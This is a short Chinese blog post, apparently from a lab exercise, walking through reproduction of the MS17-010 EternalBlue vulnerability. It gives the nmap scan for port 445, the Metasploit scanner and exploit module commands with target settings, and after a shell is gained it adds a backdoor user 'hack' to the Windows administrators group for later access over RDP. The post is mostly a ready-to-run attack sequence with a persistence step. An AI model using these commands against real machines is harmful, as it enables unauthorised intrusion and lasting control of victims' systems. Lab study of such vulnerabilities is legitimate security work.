ms17-010永恒之蓝漏洞复现

1,用nmap扫描靶机,看其开了哪些端口,是否有我们需要的445端口。

 

2,利用靶机开启的445端口,和msfconsole,对靶机进行攻击。

 msfconsole

 

1)使用auxiliary模块。 

use auxiliary/scanner/smb/smb_ms17_010

 

 2)查看需要配置的信息 

show  options

3)设置攻击目标及端口 

set rhosts 你要攻击的ip
set rport 445

 

4)使用exploit/windows/smb/ms17_010_eternalblue进行攻击。 

 

use exploit/windows/smb/ms17_010_eternalblue
或者
user 0

 

3,攻击完成得到靶机的shll,并测试靶机的连通性。

使用一些常用命令测试既可以

 

4,对靶机的shll,进行控制,添加新用户,并将新用户添加至管理组。

 

 

net user hack 123456 /add        //在windows 7上创建一个hack的用户,以便下次访问

      net localgroup administrators hack /add     //将hack加入到windows 7的本地管理员组中,以便获得更大权限

 

5,查看靶机是否开启了3389远程连接端口

 

6,对靶机进行连接控制

 

 7,成功拿下靶机并登入

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值